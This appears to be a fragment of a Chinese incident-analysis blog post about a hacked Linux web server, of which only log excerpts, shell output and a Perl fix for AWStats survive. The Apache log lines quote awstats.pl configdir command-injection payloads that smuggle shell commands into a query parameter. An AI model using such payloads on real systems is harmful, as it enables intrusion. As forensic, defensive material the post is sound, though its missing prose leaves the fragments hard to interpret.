一次Linux系統被攻擊的分析過程
1
|
more /var/log/secure | grep Accepted |
1
|
Oct 3 03:10:25 webserver sshd[20701]: Accepted password for mail from 62.17.163.186 port 53349 ssh2 |
1
|
mail:$1$kCEd3yD6$W1evaY5BMPQIqfTwTVJiX1:15400:0:99999:7::: |
1
|
nobody 22765 1 6 Sep29 ? 4-00:11:58 .t |
1
2
|
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 22765 nobody 15 0 1740m 1362m 1228 S 98.3 91.5 2892:19 .t |
1
2
|
[root@webserver ~] # /mnt/bin/ls -al /proc/22765/exe lrwxrwxrwx 1 root root 0 Sep 29 22:09 /proc/22765/exe -> /var/tmp/ … /apa/t |
1
2
3
4
5
6
7
8
9
|
[root@webserver ...] #/mnt/bin/ls -al drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 apa -rw-r--r-- 1 nobody nobody 0 Sep 29 22:09 apa.tgz drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 caca drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 haha -rw-r--r-- 1 nobody nobody 0Sep 29 22:10 kk. tar .gz -rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 login -rw-r--r-- 1 nobody nobody 0 Sep 29 22:10 login.tgz -rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 z |
1
|
. /z 62.17.163.186 |
1
2
|
62.17.163.186 - - [29 /Sep/2013 :22:17:06 +0800] "GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;ps+-aux%00 HTTP/1.0" 200 12333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0" 62.17.163.186 - - [29 /Sep/213 :22:17:35 +0800] "GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;cd+/var/tmp/.../haha;ls+-a%00 HTTP/1.0" 200 1626 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0" |
1
2
3
4
5
6
7
8
9
10
|
if ($QueryString =~ /configdir =([^&]+) /i ) { $DirConfig=&DecodeEncodedString( "$1" ); } 修改為如下即可: if ($QueryString =~ /configdir =([^&]+) /i ) { $DirConfig=&DecodeEncodedString( "$1" ); $DirConfig=~ tr /a-z0-9_ \-\/\. /a-z0-9_ \-\/\. /cd ; } |
相關文章
- 深圳信獅一次 Linux 系統被攻擊的分析過程Linux
- 一次Linux系統被***的分析過程Linux
- 記一次Linux系統被入侵的排查過程(一)Linux
- 記一次網站被攻擊 WebShell 分析網站Webshell
- 一次Linux伺服器被hack的過程分析Linux伺服器
- Linux系統呼叫過程分析Linux
- 記一次網站被攻擊經歷網站
- 一次系統升級的過程
- 密碼系統的攻擊密碼
- Linux中存在四年的嚴重漏洞被曝光,可通過Wi-Fi攻擊使系統崩潰Linux
- 記一次系統演變過程
- 主機被入侵分析過程
- 最新!高危勒索病毒,Linux與Windows被攻擊LinuxWindows
- Linux系統啟動過程Linux
- Linux 系統如何通過 netstat 命令檢視連線數判斷攻擊Linux
- Linux 系統如何透過 netstat 命令檢視連線數判斷攻擊Linux
- Linux被DDOS&CC攻擊解決例項Linux
- 存在多年的 Linux 漏洞被發現:可通過 WiFi 攻擊目標計算機LinuxWiFi計算機
- 一次HIS系統卡頓原因排查過程分享
- 網路攻擊中主動攻擊和被動攻擊有什麼區別?
- Windows作業系統的基本攻擊方式Windows作業系統
- 阿里雲ECS被攻擊阿里
- 一次分析的全過程,和大家交流
- 用Linux系統防火牆功能抵禦網路攻擊Linux防火牆
- Linux環境下發現並阻止系統攻擊(轉)Linux
- 與黑客的鬥智鬥勇-一次伺服器被攻擊的實錄黑客伺服器
- 區塊鏈生態被駭客攻擊的實時統計區塊鏈
- 隱秘的攻擊形式:無檔案攻擊型別分析型別
- 主機被入侵分析過程報告
- 記一次被黑客攻擊黑客
- 一次烏龍的SSH攻擊處理
- 眾多開源系統使用的過濾SQL隱碼攻擊函式SQL函式
- linux系統資料恢復成功的過程Linux資料恢復
- 什麼是CC攻擊?網站被CC攻擊怎麼辦?網站
- 記一次“有手就行”的從SQL隱碼攻擊到檔案上傳Getshell的簡單過程SQL
- 【知識分享】 伺服器被攻擊怎麼辦?如何防止伺服器被攻擊伺服器
- 對門控系統的攻擊面檢查
- 域滲透 | kerberos認證及過程中產生的攻擊ROS